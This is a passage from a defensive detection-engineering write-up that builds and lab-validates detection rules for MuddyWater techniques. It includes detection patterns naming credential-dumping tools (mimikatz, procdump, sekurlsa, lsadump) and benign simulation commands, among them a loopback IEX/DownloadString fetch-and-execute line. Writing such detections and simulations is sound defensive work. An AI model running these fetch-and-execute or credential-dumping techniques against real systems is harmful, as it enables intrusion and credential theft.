C.</p><pre># Rule A — LSASS process access (tool-agnostic, highest confidence)<br>event_type = process_access AND<br>target_image ENDSWITH "lsass.exe" AND<br>granted_access MATCHES "(0x1010|0x1410|0x1438|0x143a|0x1418|0x1fffff|0x1f0fff)" AND<br>source_image NOT IN ["MsMpEng.exe","csrss.exe","wininit.exe","svchost.exe",<br>                     "SecurityHealthService.exe","CylanceSvc.exe","SentinelAgent.exe"]<br><br># Rule B - Known credential tool execution (name-based backstop)<br># command_line clause is bracketed inside event_type guard (bug fix in review)<br>event_type = process_create AND<br>(image IMATCHES "mimikatz\.exe" OR<br> image ENDSWITH "procdump64.exe" OR<br> image IMATCHES "lazagne\.exe" OR<br> command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)")<br># Rule C - Dump file creation in user-writable path (artifact backstop)<br>event_type = file_create AND<br>file_extension = "dmp" AND<br>file_path MATCHES "(\\AppData\\|\\Temp\\|\\Users\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> AV and EDR agents that legitimately access LSASS — exclude by process hash, not name, since names are spoofable. Windows Error Reporting creating .dmp files in %TEMP%\WER — exclude that specific path in Rule C. Legitimate procdump usage by developers for application crash diagnostics — require a separate approved-tools baseline.</p><p><strong>Important environment note:</strong> Credential Guard and PPL (Protected Process Light) prevent LSASS reads on modern, hardened systems. If your environment has these enabled, LSASS dump detection is still valuable as a canary for misconfigured or unpatched endpoints, but confirm protection status before using coverage scores here as a measure of actual protection.</p><h3>Phase 5: Validation Lab</h3><h4>Architecture</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8U-N2gM0mGw6qRI7SG06dw.png"></figure><h4>Deploy in One Command</h4><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env   # fill in passwords<br>bash start.sh</pre><p>start.sh creates the Docker network, starts all stack services, waits for Elasticsearch, boots the Windows 10 Vagrant VM, provisions it via Ansible (Sysmon + Script Block Logging + Winlogbeat), and runs all 11 simulations.</p><h4>Simulation Design</h4><p>Every simulation is <strong>benign-by-design</strong>:</p><ul><li>No live malware, no real C2, no credential exfiltration</li><li>Simulations write benign files (VBScript with Write-Host payload), run real Windows binaries with harmless arguments, or use .NET to open process handles with minimal access masks</li><li>All .dmp files are deleted immediately after event confirmation</li><li>The VM does not connect to real Telegram infrastructure</li></ul><p>The Ansible playbook (lab/ansible/playbooks/validate.yml) runs each simulation, waits 3 seconds, queries the Windows Event Log with Get-WinEvent -FilterHashtable (time-bounded to the last 60 seconds), and prints PASS / FAIL.</p><h4>Step 21: det_mw_0001 — Spearphishing Delivery Chain</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8bLoGgU_easNlOr4ZndCgg.png"></figure><p><strong>What MuddyWater does:</strong> Delivers a ZIP or Office file via email or Egnyte/OneDrive link. The attachment contains a VBScript or WSF file that spawns a hidden encoded PowerShell loader (PowGoop/POWERSTATS).</p><p><strong>Simulation:</strong> wscript.exe sim_delivery.vbs → powershell.exe -WindowStyle Hidden -NonInteractive -EncodedCommand &lt;Base64&gt;</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *powershell.exe*<br>AND winlog.event_data.CommandLine: *EncodedCommand*</pre><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → powershell.exe -EncodedCommand. Parent-child chain and Base64 command line both visible in Kibana.</p><h4>Step 22: det_mw_0002 — Web Service Shell Spawn</h4><p><strong>What MuddyWater does:</strong> Exploits Exchange (CVE-2020–0688), IIS, or Log4j (CVE-2021–44228) — web-facing service spawns cmd.exe or powershell.exe for post-exploitation recon.</p><p><strong>Simulation:</strong> wscript.exe sim_exploit.vbs → cmd.exe /c whoami &amp; hostname &amp; ipconfig /all</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *cmd.exe*<br>AND winlog.event_data.CommandLine: (*whoami* OR *hostname* OR *ipconfig*)</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PdbeaS4qAhZO0Abz1vnxlw.png"></figure><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → cmd.exe with recon commands in CommandLine.</p><h4>Step 23: det_mw_0003 — PowerShell Encoded Command</h4><p><strong>What MuddyWater does:</strong> PowGoop uses -EncodedCommand for C2 setup. POWERSTATS uses IEX + (New-Object Net.WebClient).DownloadString(...) for stager execution.</p><p><strong>Rule A simulation:</strong> powershell.exe -NonInteractive -e &lt;Base64(Write-Host "test")&gt;</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.CommandLine: *-e*<br>AND winlog.event_data.CommandLine: *[A-Za-z0-9+/]{40,}*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t-a6QvN0QQMAwrYTgedLgw.png"></figure><p><strong>Rule A Result: PASS</strong> — 4 events captured. PowerShell with Base64 blob visible in command line.</p><p><strong>Rule B simulation:</strong> IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:19999/...'))</p><p><strong>KQL — Rule B:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *IEX*<br>AND winlog.event_data.ScriptBlockText: *DownloadString*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-VDCsOq78LyTENKxOUQjJg.png"></figure><p><strong>Rule B Result: PASS</strong> — 16 EID 4104 events. Script Block Logging decoded the IEX + DownloadString pattern.</p><blockquote><strong><em>Capability gate:</em></strong><em> Script Block Logging (EID 4104) must be explicitly enabled. Without it, Rule B is unavailable and detection degrades to command-line heuristics only.</em></blockquote><h4>Step 24: det_mw_0004 — DLL Side-Loading</h4><p><strong>What MuddyWater does:</strong> PowGoop drops Goopdate.dll alongside a copy of GoogleUpdate.exe outside the legitimate Google installation path. When GoogleUpdate launches, Windows loads the malicious DLL.</p><p><strong>Simulation:</strong> Copy a benign 4-byte MZ stub as goopdate.dll into a test directory alongside a signed binary. Launch the binary.</p><p><strong>Result: PARTIAL</strong> — Sysmon EID 7 (ImageLoad) did not fire. Root cause: a 4-byte MZ stub is not a valid loadable DLL — the Windows loader rejects it before generating an EID 7 event. The Sysmon config and detection rule are correct. <strong>Resolution:</strong> Re-test with a real GoogleUpdate.exe (requires Google Chrome installed on lab VM).</p><h4>Step 25: det_mw_0005 — Registry Run Key Persistence</h4><p><strong>What MuddyWater does:</strong> Small Sieve writes OutlookMicrosift to HKCU\...\CurrentVersion\Run — a deliberate typo designed to look like a Microsoft entry. Canopy drops a .wsf file to the Startup folder.</p><p><strong>Rule A simulation:</strong> Write OutlookMicrosift = notepad.exe to HKCU\...\Run</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 13<br>AND winlog.event_data.TargetObject: *CurrentVersion\Run\OutlookMicrosift*</pre><p><strong>Rule A Result: PASS</strong> — 3 Sysmon EID 13 events. OutlookMicrosift Run key captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RTAU8BoEU41ydMrali20PA.png"></figure><p><strong>Rule C simulation:</strong> Copy a benign .wsf file to %APPDATA%\...\Start Menu\Programs\Startup\</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *\Startup\*<br>AND winlog.event_data.TargetFilename: *.wsf*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C6VaYiU1W6t9P7VM9Uyq6Q.png"></figure><p><strong>Rule C Result: PASS</strong> — 3 Sysmon EID 11 events. WSF file creation in Startup folder captured.</p><h4>Step 26: det_mw_0006 — Scheduled Task (43-Minute Beacon)</h4><p><strong>What MuddyWater does:</strong> BugSleep creates a scheduled task triggered every <strong>43 minutes</strong>. This interval is a BugSleep artifact — not a default, not a round number. It appears in INCD 2024 reporting and is one of the most precise technical IoCs in the dataset.</p><p><strong>Simulation:</strong> schtasks.exe /create /tn DH-SIM-0006-TestTask /tr notepad.exe /sc MINUTE /mo 43 /f</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\schtasks.exe*<br>AND winlog.event_data.CommandLine: */mo 43*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8a6plhGCKeJFpgCePxizDA.png"></figure><p><strong>Result: PASS</strong> — 3 Sysmon EID 1 events. schtasks.exe /mo 43 captured. The 43-minute interval in the command line is the exact BugSleep artifact.</p><blockquote><strong><em>Hunt value:</em></strong><em> </em><em>PT43M in Task Scheduler Operational logs is a retroactive hunt trigger. One match = investigate immediately. No legitimate software uses this exact interval.</em></blockquote><h4>Step 27: det_mw_0007 — RMM Tool Abuse</h4><p><strong>What MuddyWater does:</strong> Delivers a legitimate RMM binary (ScreenConnect, SimpleHelp, AteraAgent, Level, PDQConnect) via phishing email or file-sharing link. The binary is placed in AppData, Temp, or Downloads — not installed by an IT management system. This is documented in all five government source tiers.</p><p><strong>Simulation:</strong> Copy ScreenConnect.ClientService.exe to C:\Temp\dh-lab\ and launch it.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\Temp\ScreenConnect*</pre><p><strong>Result: PASS</strong> — 6 Sysmon EID 1 events. RMM binary executing from \Temp\ captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U9wgP3tZtCZYaEGIct6woQ.png"></figure><blockquote><strong><em>Production requirement:</em></strong><em> This detection requires a baseline of authorized RMM deployments per endpoint. Without the baseline, it generates noise. With it, any out-of-baseline RMM execution is an immediate high-confidence alert.</em></blockquote><h4>Step 28: det_mw_0008a — Telegram Bot API C2</h4><p><strong>What MuddyWater does:</strong> Small Sieve uses the Telegram Bot API (api.telegram.org:443) for C2 over HTTPS. In an enterprise environment where Telegram is not standard software, any non-browser process connecting to this domain is anomalous.</p><p><strong>Simulation:</strong> powershell.exe makes an HTTP request to https://api.telegram.org/botTEST/getMe (invalid token — 401 response; the connection attempt is the evidence).</p><p><strong>Result: FAIL</strong> — Sysmon EID 3 (NetworkConnect) did not fire. Root cause: VirtualBox NAT prevents Sysmon from capturing the outbound network connection to api.telegram.org in the lab environment. The Sysmon rule config is correct. <strong>Resolution:</strong> Re-test with a host-only NIC that provides direct internet access.</p><h4>Step 29: det_mw_0008b — DNS Tunneling</h4><p><strong>What MuddyWater does:</strong> Mori uses DNS tunneling for C2. High-volume queries with long, high-entropy subdomain labels are the telemetry signature.</p><p><strong>Simulation:</strong> 60 Resolve-DnsName queries with 42-character random labels against *.test.internal.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 22<br>AND winlog.event_data.QueryName: *.test.internal*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yt5HdYyG3lGJi-pY88VPXA.png"></figure><p><strong>Result: PASS</strong> — 180 Sysmon EID 22 events captured. 42-character random labels visible in QueryName field. Volume threshold (Rule A) and label-length threshold (Rule B) would both trigger in a production deployment.</p><h4>Step 30: det_mw_0009 — WMI SecurityCenter2 Discovery</h4><p><strong>What MuddyWater does:</strong> CISA AA22–055A documents a post-access survey script that queries root\SecurityCenter2\AntiVirusProduct via WMI — enumerating the installed AV product before deciding how to proceed. This is also combined with OS info, network config, and user queries in a single script.</p><p><strong>Simulation (Rule A):</strong> Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *SecurityCenter2*</pre><p><strong>Rule A Result: PASS</strong> — 21 PS EID 4104 events. SecurityCenter2 visible in decoded ScriptBlockText.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wpLAuTyJkLgoqezMzJWISA.png"></figure><blockquote><strong><em>Detection value:</em></strong><em> SecurityCenter2 + AntiVirusProduct is one of the highest-specificity behavioral signals in this dataset. Its legitimate caller population is tiny: only AV management consoles and a few inventory tools query this namespace. A PowerShell process making this query outside those exceptions warrants immediate investigation.</em></blockquote><h4>Step 31: det_mw_0010 — LSASS Memory Access</h4><p><strong>What MuddyWater does:</strong> Uses Mimikatz, procdump64.exe, and LaZagne to dump LSASS memory and extract credentials. CISA AA22–055A names all three tools.</p><p><strong>Rule A simulation:</strong> .NET OpenProcess(PROCESS_QUERY_INFORMATION, lsass.pid) — opens a handle to lsass.exe with a minimal access mask, triggering Sysmon EID 10.</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 10<br>AND winlog.event_data.TargetImage: *lsass.exe*<br>AND winlog.event_data.GrantedAccess: 0x1400</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G-oMtjgeEzuCIKfTDznKzA.png"></figure><p><strong>Rule A Result: PASS</strong> — 3,398 Sysmon EID 10 events with GrantedAccess: 0x1400 and TargetImage: lsass.exe. The high event count is expected — LSASS receives many legitimate handle requests from AV, EDR, and Windows system processes. Production deployment requires an allowlist of known-good callers.</p><p><strong>Rule C simulation:</strong> Write a 4-byte MDMP header as lsass_test.dmp to C:\Temp\dh-lab\ — triggers Sysmon EID 11.</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *.dmp*<br>AND winlog.event_data.TargetFilename: *Temp*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TrCWgKcujqKdBRCX-OG26w.png"></figure><p><strong>Rule C Result: PASS</strong> — 6 Sysmon EID 11 events. C:\Temp\dh-lab\lsass_test.dmp creation captured.</p><blockquote><strong><em>Lab safety:</em></strong><em> The </em><em>.dmp file was deleted immediately after event confirmation. No credential material exists in the file — it was a 4-byte header stub. No real LSASS dump was performed.</em></blockquote><h3>Phase 5 Validation Results Summary</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yl6Y0h2_ePVKH3i8einFDQ.png"></figure><p>Full run: ansible-playbook playbooks/validate.yml — <strong>ok=70 changed=42 failed=0</strong></p><ul><li>Step 21 — <strong>det_mw_0001</strong> · Process spawn → <strong>PASS</strong></li><li>Step 22 — <strong>det_mw_0002</strong> · Shell from service → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule A (-e + Base64) → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule B (IEX + DownloadString) → <strong>PASS</strong></li><li>Step 24 — <strong>det_mw_0004</strong> · EID 7 ImageLoad → <strong>PARTIAL</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule A (OutlookMicrosift) → <strong>PASS</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule C (WSF in Startup) → <strong>PASS</strong></li><li>Step 26 — <strong>det_mw_0006</strong> · schtasks /mo 43 → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule A (RMM from \Temp) → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule B (RMM from PS parent) → <strong>PASS</strong></li><li>Step 28 — <strong>det_mw_0008a</strong> · EID 3 Telegram → <strong>FAIL</strong></li><li>Step 29 — <strong>det_mw_0008b</strong> · EID 22 DNS tunneling → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule A (SecurityCenter2 EID 4104) → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule B (wmic SecurityCenter2) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule A (LSASS EID 10) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule C (.dmp EID 11) → <strong>PASS</strong></li></ul><p><strong>13 PASS / 1 PARTIAL / 1 FAIL</strong> across 16 rule checks.</p><h3>Phase 6: Coverage Matrix</h3><p>Of 22 ATT&amp;CK techniques documented in the source set:</p><ul><li><strong>15 techniques (68%)</strong> — score 5, fully lab-validated</li><li><strong>2 techniques (9%)</strong> — score 4, correlated and validated via fallback</li><li><strong>4 techniques (18%)</strong> — score 3, rule present but validation incomplete</li><li><strong>7 techniques</strong> — score 0, no detection (Lateral Movement, Collection, Exfiltration, Impact)</li></ul><p><strong>The six capability gates</strong> that determine your effective coverage floor:</p><ul><li><strong>PowerShell Script Block Logging (EID 4104)</strong> — unlocks det_mw_0003 Rule B and det_mw_0009 Rules A/C. Without it: detection degrades to command-line heuristics only.</li><li><strong>Sysmon EID 10 (ProcessAccess)</strong> — unlocks det_mw_0010 Rule A (tool-agnostic LSASS access). Without it: falls back to binary name matching, misses custom dumpers.</li><li><strong>Sysmon EID 7 (ImageLoad)</strong> — unlocks det_mw_0004 (DLL side-loading). Without it: DLL loads are completely invisible.</li><li><strong>DNS resolver logging (full QNAME)</strong> — unlocks det_mw_0008b (DNS tunneling). Without it: Mori C2 channel is invisible.</li><li><strong>Network flow / proxy logs</strong> — unlocks det_mw_0007 Rule C and det_mw_0008a. Without it: RMM and Telegram C2 network-layer coverage lost.</li><li><strong>Email gateway telemetry (SEG)</strong> — unlocks det_mw_0001 full correlated logic. Without it: email-to-endpoint correlation unavailable.</li></ul><h3>What Defenders Should Do Right Now</h3><p><strong>1. Baseline your RMM deployments.</strong> det_mw_0007 is the most consistently documented MuddyWater technique across all five source tiers. It fires on ScreenConnect, SimpleHelp, AteraAgent, Level, and PDQConnect from non-standard paths. But it needs a baseline of authorized deployments first. Build the baseline; the detection logic is already written.</p><p><strong>2. Enable PowerShell Script Block Logging fleet-wide.</strong> One Group Policy change:</p><pre>Computer Configuration → Administrative Templates → Windows Components<br>→ Windows PowerShell → Turn on PowerShell Script Block Logging → Enabled</pre><p>This unlocks det_mw_0003 Rule B and all three det_mw_0009 rules. No other change required.</p><p><strong>3. Configure Sysmon ProcessAccess against lsass.exe.</strong> Without it, LSASS credential dumping detection is binary-name-only. Renamed Mimikatz and custom C++ dumpers are invisible. Add &lt;ProcessAccess onmatch="include"&gt; targeting lsass.exe to sysmon.xml.</p><p><strong>4. Hunt for PT43M now.</strong> Query your Task Scheduler Operational logs for any task with a RepetitionInterval of PT43M. If you find one you didn't create, that is BugSleep. No other legitimate software uses this interval.</p><h3>Reproduce It Yourself</h3><p>The entire project is on GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra"><strong>github.com/anpa1200/operation-desert-hydra</strong></a></p><p>One repository contains everything: Docker Compose stack (OpenCTI + Elasticsearch + Kibana), Vagrant lab VM, Ansible provisioning playbooks, detection rules in four formats (Sigma, KQL, Elastic JSON, SPL), structured intelligence datasets (YAML), and all 12 proof screenshots.</p><p><strong>Deploy:</strong></p><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env<br># fill in ELASTIC_PASSWORD, OPENCTI_ADMIN_PASSWORD, OPENCTI_ADMIN_TOKEN<br>bash start.sh<br># → OpenCTI: http://localhost:8080<br># → Kibana:  http://localhost:5601<br># → all 11 simulations run automatically (~10 min)</pre><p><strong>Stop / destroy:</strong></p><pre>bash stop.sh                # halt VM, keep stack and data<br>bash stop.sh --destroy-vm   # remove VM disk<br>bash stop.sh --destroy-stack  # also stop Docker stack</pre><p><strong>Skip the lab VM</strong> (OpenCTI + Kibana only, no Windows VM):</p><pre>bash start.sh --skip-lab</pre><p>Prerequisites: Docker, VirtualBox, Vagrant, Ansible, Python 3 + pywinrm. Full details in the <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/README.md">README</a>.</p><p>Key files:</p><ul><li>docs/article-step-0-project-scenario.md — full phase-by-phase walkthrough</li><li>data/detections.yaml — all 11 detection records with coverage scores</li><li>lab/ansible/playbooks/validate.yml — the 11 simulation playbook</li><li>detections/sigma/, detections/kql/, detections/elastic/, detections/spl/ — rule exports</li></ul><h3>What This Project Is Not</h3><p>This is not a red team toolkit. The lab produces benign telemetry for detection validation — no live malware, no real C2, no credential theft. The detection pseudologic is SIEM-agnostic and requires production translation and tuning before deployment. Coverage scores are conservative: 5 requires a Kibana screenshot, not just passing logic.</p><p>The source base is entirely public. The actor’s actual TTPs may be more sophisticated than what is documented. Treat the coverage matrix as a floor, not a ceiling.</p><h3>Production Scars</h3><p>Everything above describes what the project looks like after it worked. This section documents what broke, in what order, and what was actually fixed — the kind of detail that gets cut from writeups but is the most useful part for anyone trying to reproduce this.</p><h4>Scar 1: The Simulations Were Faking It</h4><p>The first validation attempt used synthetic event markers. The simulation playbook injected a DH-SIM-0001 string into the CommandLine field, then the Kibana queries looked for that exact string:</p><pre>winlog.event_id: 1 AND winlog.event_data.CommandLine: *DH-SIM-0001*</pre><p>This produces a screenshot. It does not prove a detection works.</p><p>The problem is fundamental: a query that looks for a marker you injected proves that injection works, not that a detection fires on real attacker behavior. If MuddyWater runs wscript.exe and spawns powershell.exe -EncodedCommand, the DH-SIM-0001 query returns nothing. The detection coverage number was meaningless.</p><p><strong>What was fixed:</strong> All simulations were rewritten to produce realistic execution chains — wscript.exe spawning powershell.exe -EncodedCommand &lt;base64&gt;, schtasks.exe /create /sc minute /mo 43, lsass.exe being accessed by a test process with the correct GrantedAccess mask. All KQL queries were rewritten to use real field-based conditions: winlog.event_data.ParentImage, winlog.event_data.GrantedAccess, winlog.event_data.TargetObject, winlog.event_data.ScriptBlockText. Every proof screenshot now shows a real field value, not a synthetic marker.</p><p><strong>The lesson:</strong> A proof screenshot is only as good as the conditions that trigger it. If the simulation writes what the query reads, you have a tautology, not a detection.</p><h4>Scar 2: det_mw_0004 — The DLL That Wouldn’t Load</h4><p>The simulation for det_mw_0004 (DLL side-loading) created a 4-byte MZ-header stub file named Goopdate.dll in a temp directory alongside GoogleUpdate.exe, then waited for Sysmon Event ID 7 (ImageLoad) to fire.</p><p>It never fired.</p><p>Root cause: a 4-byte MZ stub is not a valid PE binary. The Windows loader parses the PE header before loading — the stub fails the loader’s structural validation and is rejected before the load event is generated. Sysmon only generates EID 7 for DLLs that actually get mapped into process memory. A file that fails to load produces no EID 7.</p><p>The Sysmon configuration was correct. The detection rule was correct. The simulation was wrong.</p><p><strong>Result: PARTIAL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> The test needs a real, valid DLL — even an empty DLL compiled from a single DllMain that returns TRUE. Alternatively, installing the actual Google Chrome on the lab VM provides a real Goopdate.dll at the expected path, which could then be copied to a non-standard location. Neither was done in this iteration due to lab scope constraints (no internet access on the VM for Chrome installation, no compiler toolchain in the lab).</p><p><strong>The lesson:</strong> When validating EID 7 detections, your test artifact must be a valid loadable PE. A stub file saves time and produces nothing.</p><h4>Scar 3: det_mw_0008a — VirtualBox NAT Ate the Telegram Traffic</h4><p>The simulation for det_mw_0008a (Telegram Bot API C2) made an outbound HTTPS connection to api.telegram.org from PowerShell and waited for Sysmon Event ID 3 (NetworkConnect) to fire.</p><p>It never fired.</p><p>Root cause: VirtualBox NAT performs network address translation at the hypervisor level. Sysmon captures network connections at the Windows kernel level. With NAT, the connection from the VM’s perspective terminates at the NAT gateway (10.0.2.2), not at api.telegram.org. Sysmon sees a connection to 10.0.2.2:443, not api.telegram.org:443. The detection rule looking for api.telegram.org as the destination found nothing.</p><p>There was an additional layer: VirtualBox NAT does not forward arbitrary outbound HTTPS traffic by default in this lab configuration — the VM had no direct internet path, only access to the host’s 10.0.2.2 gateway. Even fixing the Sysmon observation problem would require a working internet path from the VM.</p><p><strong>Result: FAIL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> Add a host-only or bridged network adapter to the VM that provides direct internet access, and confirm Sysmon captures the connection with the external destination. Alternatively, run a local HTTPS server on the host at api.telegram.org via a hosts file override, which would make the destination resolvable within the lab and catchable by Sysmon.</p><p><strong>The lesson:</strong> VirtualBox NAT is the right choice for lab isolation (the VM cannot reach the internet accidentally), but it is the wrong choice if you need to validate detections based on external destination hostnames. Design the network topology before writing detection validation cases.</p><h4>Scar 4: Kibana Showed Nothing — Wrong Time Window</h4><p>After running the SecurityCenter2 WMI discovery simulation (Step 30), the Kibana query returned zero results.</p><p>The query was correct. The simulation had run correctly. The events were in Elasticsearch.</p><p>Root cause: Kibana’s default time window was set to “Last 15 minutes.” The simulation had run in a previous lab session, and Winlogbeat had shipped the events to Elasticsearch during that session. The events existed — they were just outside the current time window.</p><p><strong>What was fixed:</strong> Changed the time filter to “Last 24 hours.” Events appeared immediately.</p><p><strong>The lesson:</strong> When a Kibana proof shows no results, the first diagnostic step is the time filter, not the query. This is obvious in retrospect and a consistent source of false “detection failed” conclusions during initial validation runs.</p><h4>Scar 5: Detection Design Bugs Found in Review (Before Validation)</h4><p>Before running any simulations, every detection record went through a structured review pass. Four real bugs were found:</p><p><strong>det_mw_0010 Rule B — Operator precedence error.</strong> The original pseudologic was:</p><pre>event_type = process_create AND<br>image IMATCHES "mimikatz\.exe" OR<br>image ENDSWITH "procdump64.exe" OR<br>command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)"</pre><p>Without explicit parentheses, OR has lower precedence than AND in most query languages. The command_line IMATCHES clause was evaluated independently of the event_type guard, meaning the rule would fire on any event (not just process_create) where the command line contained sekurlsa. In a SIEM with millions of events per day, this generates noise and potentially masks the real signal. The fix added explicit brackets to keep all OR branches inside the event_type = process_create guard.</p><p><strong>det_mw_0009 Rule C — T1033 was not covered.</strong> The initial Rule C matched SecurityCenter2, Win32_NetworkAdapterConfiguration, and Win32_OperatingSystem — covering T1518.001, T1016, and T1082. The documented CISA script also collects the username via Win32_ComputerSystem. T1033 (System Owner/User Discovery) was missing. Fixed by adding Win32_ComputerSystem|Win32_UserAccount|UserName to the pattern match.</p><p><strong>det_mw_0004 Rule A — Missing x86 Google path.</strong> The initial allowlist only contained the x64 path C:\Program Files\Google\. On 64-bit Windows, the 32-bit Google Update installs to C:\Program Files (x86)\Google\. Without the x86 path in the allowlist, any Goopdate.dll load from the legitimate 32-bit Google installation would fire the detection. Added both paths.</p><p><strong>det_mw_0010 Rule A — Access mask set too narrow.</strong> The initial mask set covered standard Mimikatz masks (0x1010, 0x1410, 0x1438) but missed 0x1fffff (PROCESS_ALL_ACCESS, used by custom C++ dumpers and some loaders) and 0x1f0fff (another all-access variant observed in field reporting). A detection that only catches stock Mimikatz masks is bypassed by any custom implementation. Extended the mask set to cover known custom-dumper variants.</p><p><strong>The lesson:</strong> Writing pseudologic in a YAML field with no syntax validation means operator precedence bugs survive until someone reads the logic carefully. Structured peer review — ideally by someone who will try to break the rule — catches these before they hit production.</p><h4>Scar 6: The OpenCTI Stack Was in a Different Repository</h4><p>The original project structure had the OpenCTI Docker Compose stack in a separate repository (opencti-intelligent-shield) that was not included in the desert-hydra repo. The start.sh script referenced the external repo with a hardcoded path. Cloning operation-desert-hydra and running start.sh failed immediately on any machine other than the development machine.</p><p><strong>What was fixed:</strong> The entire stack — docker-compose.yml, docker-compose.kibana.yml, and .env.template — was copied into stack/ inside the desert-hydra repo. All path references were updated. The repo is now fully self-contained: git clone + cp .env.template .env + bash start.sh works from a clean machine with no external dependencies beyond Docker, Vagrant, VirtualBox, Ansible, and pywinrm.</p><p><strong>The lesson:</strong> A reproducibility claim requires everything needed to reproduce to be in the same repository. External path dependencies are invisible during development and obvious on first external clone.</p><h4>Scar 7: MITRE Connector Timing</h4><p>The import script (tools/opencti_import.py) creates MuddyWater → uses → ATT&amp;CK technique relationships by looking up techniques that the MITRE ATT&amp;CK connector has synced into OpenCTI. The connector takes several minutes to complete its initial sync of 846 techniques.</p><p>If the import script runs before the connector finishes, the technique lookup returns nothing — the techniques don’t exist yet. The original script failed silently on these lookups and skipped the relationship creation.</p><p><strong>What was fixed:</strong> The script was updated with find_or_create_attack_pattern(): if a technique is not yet in OpenCTI, create a stub AttackPattern object with the correct x_mitre_id. When the MITRE connector eventually syncs that technique, OpenCTI's deduplication logic merges the stub with the connector's fully populated object. All relationships that were created against the stub are preserved and now point to the enriched object. Running the script a second time after the connector finishes confirms existing objects rather than creating duplicates.</p><p><strong>The lesson:</strong> Any script that creates relationships against objects populated by a connector needs to handle the case where the connector has not finished. Fail loudly or create stubs — don’t skip silently.</p><h4>Surviving Gaps</h4><p>Two failures from Phase 5 remain open:</p><p><strong>det_mw_0004</strong> — DLL side-loading detection (EID 7) is not lab-validated. The detection rule is sound; the simulation needs a valid PE DLL. Coverage score stays at 3 until the lab is extended with a compiled test DLL.</p><p><strong>det_mw_0008a</strong> — Telegram Bot API connection detection (EID 3) is not lab-validated. The detection rule is sound; the lab network topology prevents capturing external destination hostnames via NAT. Coverage score stays at 3 until the VM has a direct internet path or a local HTTPS proxy target.</p><p>These are documented as open items, not dismissed as “out of scope.” The coverage score scale is designed to reflect this: a score of 3 means “behavioral detection, no lab proof” — it is honest about the gap rather than claiming coverage that was not validated.</p><p><strong>Seven ATT&amp;CK techniques have zero detection coverage.</strong> Lateral movement (T1021.001 RDP, T1550.002 Pass the Hash), Collection (T1005, T1039), Exfiltration (T1041), and Impact (T1486 ransomware, T1490 shadow copy deletion from DarkBit). These are acknowledged in the coverage matrix, not hidden. The actor uses them. The public source base documents them. The detection coverage does not exist in this iteration.</p><p><em>All code, data, and proof screenshots are version-controlled at </em><a href="https://github.com/anpa1200/operation-desert-hydra"><em>github.com/anpa1200/operation-desert-hydra</em></a></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a 